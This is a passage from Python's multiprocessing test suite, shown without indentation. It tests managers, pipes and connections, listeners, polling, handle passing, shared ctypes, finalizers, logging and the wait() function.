self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=5)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_test_process, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
